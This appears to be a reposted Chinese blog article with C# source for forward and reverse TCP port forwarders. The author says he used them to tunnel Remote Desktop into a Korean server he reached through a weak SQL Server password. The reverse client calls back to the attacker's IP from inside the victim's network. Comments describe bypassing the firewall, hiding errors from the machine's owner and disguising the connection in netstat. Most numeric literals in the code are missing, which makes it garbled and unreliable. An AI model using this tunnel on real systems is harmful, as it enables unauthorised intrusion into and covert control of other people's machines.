【转发】c#做端口转发程序支持正向连接和反向链接
可以通过中转server来连接sql server,连接的时候用ip,port,不是冒号,是逗号
但试过local port 21想连接AS400的FTP却不成功。。。为咩涅。。。
https://www.cnblogs.com/mutuan/archive/2011/09/09/2172854.html
3389的时候
例子1:连接a机器的3389端口连不上,因为对方防火墙或者网关做了限制,只能访问a机器的个别端口比如80。
例子2:连接a机器的几乎所有端口都连不上(对方乃内网或者防火墙网关做了限制),只能1433上去,但是对方可以连接你的某些端口。
解决
第一种较简单,只需要程序在对方开80,你连接他80,程序收到数据后,发送到他本机的3389,同时从他3389收到数据后返回到你。程序就是一个中转站。
//服务器端
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading; namespace fanxiangserver
{
class Program
{
public static Dictionary<int, TcpClient> dic = new Dictionary<int, TcpClient>();
public static NetworkStream kongzhins = null;
static void Main(string[] args)
{
ThreadPool.QueueUserWorkItem(new WaitCallback(start1));
ThreadPool.QueueUserWorkItem(new WaitCallback(start2));
WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });
}
public static void start1(object obj)
{
TcpListener tl = new TcpListener();//开一个对方可以连接的端口,今天这棒子机器连他只能1433,其他连不上,他连别人只能80 8080 21
tl.Start();
while (true)
{
TcpClient tc = tl.AcceptTcpClient();
jieshou(tc);
}
}
public static void start2(object obj)
{
TcpListener tl = new TcpListener(); //开一个随意端口让自己的mstsc连。
tl.Start();
while (true)
{
TcpClient tc = tl.AcceptTcpClient();
Random rnd = new Random();
int biaoji = rnd.Next(, );
dic.Add(biaoji, tc);
byte[] bt = BitConverter.GetBytes(biaoji);
kongzhins.Write(bt, , bt.Length);
}
}
public static void jieshou(TcpClient tc)
{
//这里体现的是一个配对的问题,自己体会一下吧
NetworkStream ns = tc.GetStream();
byte[] bt = new byte[];
int count = ns.Read(bt, , bt.Length);
if (count == && bt[] == 0x6f && bt[] == 0x6b)
{
kongzhins = ns;
}
else
{
int biaoji = BitConverter.ToInt32(bt, );
lianjie(biaoji, tc);
}
}
public static void lianjie(int biaoji, TcpClient tc1)
{
TcpClient tc2 = null;
if (dic.ContainsKey(biaoji))
{
dic.TryGetValue(biaoji, out tc2);
dic.Remove(biaoji);
tc1.SendTimeout = ;
tc1.ReceiveTimeout = ;
tc2.SendTimeout = ;
tc2.ReceiveTimeout = ;
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[];
TcpClient tc2 = ((TcpClient[])obj)[];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
//这里必须try catch,否则连接一旦中断程序就崩溃了,要是弹出错误提示让机主看见那就囧了
byte[] bt = new byte[];
int count = ns1.Read(bt, , bt.Length);
ns2.Write(bt, , count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
//客户端
using System;
using System.Text;
using System.Net.Sockets;
using System.Threading; namespace fanxiangclient
{
class Program
{
public static NetworkStream kongzhins = null;
static void Main(string[] args)
{
try
{
TcpClient tc = new TcpClient("你的IP", );
kongzhins = tc.GetStream();
byte[] bt = Encoding.Default.GetBytes("ok");//这里发送一个连接提示
kongzhins.Write(bt, , bt.Length);
jieshou();
WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });//这里为什么要这样呢?我发现sqlserver执行是localsystem账号如果console.read()程序马上退出
}
catch { }
}
public static void jieshou()
{
while (true)
{
byte[] bt = new byte[];
kongzhins.Read(bt, , bt.Length);
TcpClient tc1 = new TcpClient("你的IP", );
TcpClient tc2 = new TcpClient("localhost", );
tc1.SendTimeout = ;
tc1.ReceiveTimeout = ;
tc2.SendTimeout = ;
tc2.ReceiveTimeout = ;
tc1.GetStream().Write(bt, , bt.Length);
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[];
TcpClient tc2 = ((TcpClient[])obj)[];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
byte[] bt = new byte[];
int count = ns1.Read(bt, , bt.Length);
ns2.Write(bt, , count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
这样在对方机器执行和,直接mstsc /v:对方ip:80就能终端上去了
第二种稍微复杂一点,需要客户机和服务器2个程序,你在自己机器上开服务器端,在对方机器上执行客户端连接你的服务器端,一旦连接上你的服务器端再开个端口让终端程序连接,对方机器上客户端再开个端口连接他自己的3389,做2次中转就可以终端上去了。
具体流程
本机ip开8080端口
对方机器连接你的8080端口,比如端口是49908
连接成功后
你的机器再开一个比如9833端口
对方机器再开一个连接连接他自己的3389,比如端口是49909吧
好这时你用你的mstsc连接自己的 localhost:9833,数据包就从本机9833-本机8080-对方49908-对方49909-对方3389,对方3389的数据反着回来就行了。
//客户端
using System;
using System.Text;
using System.Net.Sockets;
using System.Threading; namespace fanxiangclient
{
class Program
{
public static NetworkStream kongzhins = null;
static void Main(string[] args)
{
try
{
TcpClient tc = new TcpClient("你的IP", );
kongzhins = tc.GetStream();
byte[] bt = Encoding.Default.GetBytes("ok");//这里发送一个连接提示
kongzhins.Write(bt, , bt.Length);
jieshou();
WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });//这里为什么要这样呢?我发现sqlserver执行是localsystem账号如果console.read()程序马上退出
}
catch { }
}
public static void jieshou()
{
while (true)
{
byte[] bt = new byte[];
kongzhins.Read(bt, , bt.Length);
TcpClient tc1 = new TcpClient("你的IP", );
TcpClient tc2 = new TcpClient("localhost", );
tc1.SendTimeout = ;
tc1.ReceiveTimeout = ;
tc2.SendTimeout = ;
tc2.ReceiveTimeout = ;
tc1.GetStream().Write(bt, , bt.Length);
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[];
TcpClient tc2 = ((TcpClient[])obj)[];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
byte[] bt = new byte[];
int count = ns1.Read(bt, , bt.Length);
ns2.Write(bt, , count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
好,这样你连接mstsc /v:localhost:9833,后数据就经过了好几转转到了对方的3389上。这样即使对方是内网也可以被终端了,而且好处是对方查看netstat -an看到的是这种东西
只能看到他的49908在连接我的8080,就像看网站一样,要是80就更像了,而49909连接3389一般注意不到,反正没有ip地址,这棒子想不到吧,他做的这么变态的限制都被终端上去了,起因就是sqlserver弱口令和权限,这个机器是win2008,i7 920的u,不明白棒子的网管为什么一点安全知识都没有,而且屡教不改,上次进去一看,那机器已经被国内黑克给x了n遍了,上边布满了木马,最后实在启动不了了,他重装了,结果那个sqlserver还是那个权限还是那个密码,服气吧。但是如果netstat -ano发现连我的pid和连3389的pid是一个那就可以发现了。
以上程序都是经我测试后非常ok的,但是没有经过优化,尤其是反向连接的,可以做成个服务是吧,或者连接的时候加个验证啦什么的,还有我的Ip地址也是变的,可以做成个服务,定时读取某一网页上我的新ip,告诉他连还是不连啦,什么的。而且还可以做成个http代理翻wall啦,总之花样是很多的。
【转发】c#做端口转发程序支持正向连接和反向链接的更多相关文章
- 使用iptables做端口转发
通过iptables可以做转发 #!/bin/sh IPT="/sbin/iptables" /bin/echo "1" > /proc/sys/net/ ...
- 使用SSH端口做端口转发以及反向隧道
目录 SSH做本地端口转发 SSH做反向隧道(远程端口转发) 用autossh建立稳定隧道 SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件,将 GatewayPorts修 ...
- 使用SecureCRT做端口转发
我的笔记本只能访问跳板机,跳板机是Linux系统,访问内网机器需要在跳板机内通过ssh命令访问,特别不方便,而且我们还需要访问Windows或web网站. 这是我们就可以做一个端口转发,通过自己的笔记 ...
- iptables做端口转发
一.用iptables做本机端口转发 比如80端口转8080端口 代码如下: iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT ...
- mac 使用 pf 做端口转发
Mac os中我发现直接输入localhost是拒绝访问的,原因在于OSX 对于1024内端口需要 root 权限,因此需要做一个80端口的转发. 曾经的 ipfw 已经被 pf 所替换. 首先我们要 ...
- CentOS下用rinetd做端口转发
windows下的端口转发一般用的是自带的nat和porttunnel.portmap linux下端口转发映射的程序叫rinetd,启动方法rinetd -c /etc/rinetd.conf , ...
- 利用iptables做端口转发
需求背景: A与C不在同一网段无法直接访问,而A和B,C和B可以互通.现需要A借助B访问C的3306端口. 解决方案: 利用iptables配置规则,实现端口转发. 具体操作: 在B上开启端口转发功能 ...
- 使用ssh正向连接、反向连接、做socks代理的方法
ssh -L 219.143.16.157:58080:172.21.163.32:8080 用户名@localhost -p 10142 在 219.143.16.157机器执行 将ssh隧 ...
- 【nginx配置】nginx做非80端口转发
一个场景 最近在使用PHP重写一个使用JAVA写的项目,因为需要查看之前的项目,所以要在本地搭建一个Tomcat来跑JAVA的项目.搭建成功后,因为Tomcat监听的端口是8080,因此,访问的URL ...
随机推荐
- Linux组管理、用户管理、查看用户信息、usermod、which、切换用户、修改文件具体权限
组管理 提示:创建组/删除组的终端命令都需要通过sudo执行 序号 命令 作用 01 groupadd组名 添加组 02 groupdel组名 删除组 03 cat/etc/group 确认组信息 0 ...
- javascript 代码实例
数组去重 function unique(arr){ if(!Array.isArray(arr)){ console.log('type error!'); return; } arr = arr. ...
- Jenkins安装maven integration plugin失败解决方法
最近装了一个jenkins准备搞一个自动化测试的持续集成,但是在安装maven integration这个插件时报错,试了几次都是失败! 错误原因如下: javadoc安装失败: java.io.IO ...
- 【1】BIO与NIO、AIO的区别
一.BIO 在JDK1.4出来之前,我们建立网络连接的时候采用BIO模式,需要先在服务端启动一个ServerSocket,然后在客户端启动Socket来对服务端进行通信,默认情况下服务端需要对每个请求 ...
- Unity的学习笔记(鼠标移动控制视角移动)
using UnityEngine; public class MouseLook : MonoBehaviour { , MouseX = , MouseY = } //定义一个枚举,移动xy,或者 ...
- asp.net WEB简单打印
ASP.NET网页打印 2018.08.26 18:50 1096浏览 昨晚朋友要求在前段时间完成的新闻的网站上加上一个功能,就是在每篇新闻浏览的页面, 加一个打印铵钮.让用户一点打印,能把整篇文 ...
- Windows系统中环境变量不展开的问题
Windows系统中环境变量不展开的问题 问题现象:Windows.System32等系统目录里命令,无法通过Path搜索路径来执行.查看Path环境变量结果如下: D:\>echo %Path ...
- GitHub上传文件夹
1.输入自己的用户名和邮箱 为注册GitHub账号时所用的用户名和邮箱;我的用户名为“1997ST2016”,邮箱为“1324971964@qq.com ”. $ git config --globa ...
- element-ui tree 设置成单选,并且父级不可选
<el-tree :data="date" //数据来源 show-checkbox //节点是否可被选择 node-key="moduldCode" / ...
- 将H5页面打包成安卓原生app
第一步:下载HBuilderX,新建项目选择5+App新建一个空项目如下图 新建后项目目录结构如下图 第二步,将你要打包成安卓app的文件打包,最后生成的文件目录如下图 1.打包完成后,将对应文件内容 ...